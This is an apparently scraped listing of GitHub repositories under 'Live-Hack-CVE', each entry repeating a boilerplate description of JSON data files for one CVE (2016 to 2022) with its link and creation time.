**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15917 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15917](https://github.com/Live-Hack-CVE/CVE-2020-15917) create time: 2022-12-23T19:44:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7016 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7016](https://github.com/Live-Hack-CVE/CVE-2020-7016) create time: 2022-12-23T19:44:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14444 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14444](https://github.com/Live-Hack-CVE/CVE-2020-14444) create time: 2022-12-23T19:44:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14445 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14445](https://github.com/Live-Hack-CVE/CVE-2020-14445) create time: 2022-12-23T19:44:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15706 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15706](https://github.com/Live-Hack-CVE/CVE-2020-15706) create time: 2022-12-23T19:44:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10803 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10803](https://github.com/Live-Hack-CVE/CVE-2020-10803) create time: 2022-12-23T19:44:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-17373 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-17373](https://github.com/Live-Hack-CVE/CVE-2020-17373) create time: 2022-12-23T19:44:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10713 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10713](https://github.com/Live-Hack-CVE/CVE-2020-10713) create time: 2022-12-23T19:44:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13285 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13285](https://github.com/Live-Hack-CVE/CVE-2020-13285) create time: 2022-12-23T19:44:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15309 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15309](https://github.com/Live-Hack-CVE/CVE-2020-15309) create time: 2022-12-23T19:43:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6020 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6020](https://github.com/Live-Hack-CVE/CVE-2020-6020) create time: 2022-12-23T19:43:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40289 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40289](https://github.com/Live-Hack-CVE/CVE-2021-40289) create time: 2022-12-23T19:51:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39144 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39144](https://github.com/Live-Hack-CVE/CVE-2021-39144) create time: 2022-12-23T19:51:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41381 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41381](https://github.com/Live-Hack-CVE/CVE-2021-41381) create time: 2022-12-23T19:50:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40226 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40226](https://github.com/Live-Hack-CVE/CVE-2021-40226) create time: 2022-12-23T19:49:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33064 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33064](https://github.com/Live-Hack-CVE/CVE-2021-33064) create time: 2022-12-23T19:48:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30498 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30498](https://github.com/Live-Hack-CVE/CVE-2021-30498) create time: 2022-12-23T19:46:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20294 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20294](https://github.com/Live-Hack-CVE/CVE-2021-20294) create time: 2022-12-23T19:46:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3634 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3634](https://github.com/Live-Hack-CVE/CVE-2021-3634) create time: 2022-12-23T19:45:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21772 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21772](https://github.com/Live-Hack-CVE/CVE-2021-21772) create time: 2022-12-23T19:45:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4001 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4001](https://github.com/Live-Hack-CVE/CVE-2021-4001) create time: 2022-12-23T19:45:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40158 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40158](https://github.com/Live-Hack-CVE/CVE-2021-40158) create time: 2022-12-23T19:44:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40159 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40159](https://github.com/Live-Hack-CVE/CVE-2021-40159) create time: 2022-12-23T19:44:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0185 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0185](https://github.com/Live-Hack-CVE/CVE-2021-0185) create time: 2022-12-23T19:42:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34569 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34569](https://github.com/Live-Hack-CVE/CVE-2021-34569) create time: 2022-12-23T19:41:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34568 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34568](https://github.com/Live-Hack-CVE/CVE-2021-34568) create time: 2022-12-23T19:41:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34567 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34567](https://github.com/Live-Hack-CVE/CVE-2021-34567) create time: 2022-12-23T19:41:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34566 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34566](https://github.com/Live-Hack-CVE/CVE-2021-34566) create time: 2022-12-23T19:41:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3866 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3866](https://github.com/Live-Hack-CVE/CVE-2022-3866) create time: 2022-12-23T19:51:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3867 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3867](https://github.com/Live-Hack-CVE/CVE-2022-3867) create time: 2022-12-23T19:51:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39037 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39037](https://github.com/Live-Hack-CVE/CVE-2022-39037) create time: 2022-12-23T19:51:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39038 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39038](https://github.com/Live-Hack-CVE/CVE-2022-39038) create time: 2022-12-23T19:51:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45130 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45130](https://github.com/Live-Hack-CVE/CVE-2022-45130) create time: 2022-12-23T19:51:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32190 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32190](https://github.com/Live-Hack-CVE/CVE-2022-32190) create time: 2022-12-23T19:51:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44088 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44088](https://github.com/Live-Hack-CVE/CVE-2022-44088) create time: 2022-12-23T19:51:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3122 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3122](https://github.com/Live-Hack-CVE/CVE-2022-3122) create time: 2022-12-23T19:51:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38577 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38577](https://github.com/Live-Hack-CVE/CVE-2022-38577) create time: 2022-12-23T19:51:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37623 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37623](https://github.com/Live-Hack-CVE/CVE-2022-37623) create time: 2022-12-23T19:51:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44727 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44727](https://github.com/Live-Hack-CVE/CVE-2022-44727) create time: 2022-12-23T19:51:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45129 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45129](https://github.com/Live-Hack-CVE/CVE-2022-45129) create time: 2022-12-23T19:50:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38119 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38119](https://github.com/Live-Hack-CVE/CVE-2022-38119) create time: 2022-12-23T19:50:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38120 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38120](https://github.com/Live-Hack-CVE/CVE-2022-38120) create time: 2022-12-23T19:50:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43679 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43679](https://github.com/Live-Hack-CVE/CVE-2022-43679) create time: 2022-12-23T19:50:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41879 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41879](https://github.com/Live-Hack-CVE/CVE-2022-41879) create time: 2022-12-23T19:50:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38122 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38122](https://github.com/Live-Hack-CVE/CVE-2022-38122) create time: 2022-12-23T19:50:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44089 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44089](https://github.com/Live-Hack-CVE/CVE-2022-44089) create time: 2022-12-23T19:50:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44087 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44087](https://github.com/Live-Hack-CVE/CVE-2022-44087) create time: 2022-12-23T19:50:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42460 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42460](https://github.com/Live-Hack-CVE/CVE-2022-42460) create time: 2022-12-23T19:50:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41878 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41878](https://github.com/Live-Hack-CVE/CVE-2022-41878) create time: 2022-12-23T19:50:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38121 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38121](https://github.com/Live-Hack-CVE/CVE-2022-38121) create time: 2022-12-23T19:50:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41876 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41876](https://github.com/Live-Hack-CVE/CVE-2022-41876) create time: 2022-12-23T19:49:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41874 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41874](https://github.com/Live-Hack-CVE/CVE-2022-41874) create time: 2022-12-23T19:49:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3949 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3949](https://github.com/Live-Hack-CVE/CVE-2022-3949) create time: 2022-12-23T19:49:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39388 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39388](https://github.com/Live-Hack-CVE/CVE-2022-39388) create time: 2022-12-23T19:49:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36022 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36022](https://github.com/Live-Hack-CVE/CVE-2022-36022) create time: 2022-12-23T19:49:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35740 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35740](https://github.com/Live-Hack-CVE/CVE-2022-35740) create time: 2022-12-23T19:49:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26088 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26088](https://github.com/Live-Hack-CVE/CVE-2022-26088) create time: 2022-12-23T19:49:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43074 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43074](https://github.com/Live-Hack-CVE/CVE-2022-43074) create time: 2022-12-23T19:49:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7874 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7874](https://github.com/Live-Hack-CVE/CVE-2016-7874) create time: 2022-12-23T18:59:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7875 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7875](https://github.com/Live-Hack-CVE/CVE-2016-7875) create time: 2022-12-23T18:59:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7877 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7877](https://github.com/Live-Hack-CVE/CVE-2016-7877) create time: 2022-12-23T18:59:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7878 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7878](https://github.com/Live-Hack-CVE/CVE-2016-7878) create time: 2022-12-23T18:29:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7879 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7879](https://github.com/Live-Hack-CVE/CVE-2016-7879) create time: 2022-12-23T18:28:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7880 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7880](https://github.com/Live-Hack-CVE/CVE-2016-7880) create time: 2022-12-23T18:28:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7892 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7892](https://github.com/Live-Hack-CVE/CVE-2016-7892) create time: 2022-12-23T18:28:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7881 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7881](https://github.com/Live-Hack-CVE/CVE-2016-7881) create time: 2022-12-23T18:28:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7890 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7890](https://github.com/Live-Hack-CVE/CVE-2016-7890) create time: 2022-12-23T18:28:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7873 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7873](https://github.com/Live-Hack-CVE/CVE-2016-7873) create time: 2022-12-23T18:27:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7870 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7870](https://github.com/Live-Hack-CVE/CVE-2016-7870) create time: 2022-12-23T18:27:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7872 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7872](https://github.com/Live-Hack-CVE/CVE-2016-7872) create time: 2022-12-23T18:27:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7871 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7871](https://github.com/Live-Hack-CVE/CVE-2016-7871) create time: 2022-12-23T18:27:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7869 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7869](https://github.com/Live-Hack-CVE/CVE-2016-7869) create time: 2022-12-23T18:27:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7868 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7868](https://github.com/Live-Hack-CVE/CVE-2016-7868) create time: 2022-12-23T18:27:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7867 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7867](https://github.com/Live-Hack-CVE/CVE-2016-7867) create time: 2022-12-23T18:27:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-18926 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-18926](https://github.com/Live-Hack-CVE/CVE-2017-18926) create time: 2022-12-23T19:09:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3085 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3085](https://github.com/Live-Hack-CVE/CVE-2017-3085) create time: 2022-12-23T18:28:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3106 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3106](https://github.com/Live-Hack-CVE/CVE-2017-3106) create time: 2022-12-23T18:28:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2926 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2926](https://github.com/Live-Hack-CVE/CVE-2017-2926) create time: 2022-12-23T18:28:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2937 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2937](https://github.com/Live-Hack-CVE/CVE-2017-2937) create time: 2022-12-23T18:28:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2936 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2936](https://github.com/Live-Hack-CVE/CVE-2017-2936) create time: 2022-12-23T18:28:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2934 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2934](https://github.com/Live-Hack-CVE/CVE-2017-2934) create time: 2022-12-23T18:28:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2933 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2933](https://github.com/Live-Hack-CVE/CVE-2017-2933) create time: 2022-12-23T18:28:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2932 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2932](https://github.com/Live-Hack-CVE/CVE-2017-2932) create time: 2022-12-23T18:28:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2935 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2935](https://github.com/Live-Hack-CVE/CVE-2017-2935) create time: 2022-12-23T18:27:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19951 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19951](https://github.com/Live-Hack-CVE/CVE-2018-19951) create time: 2022-12-23T19:10:06Z

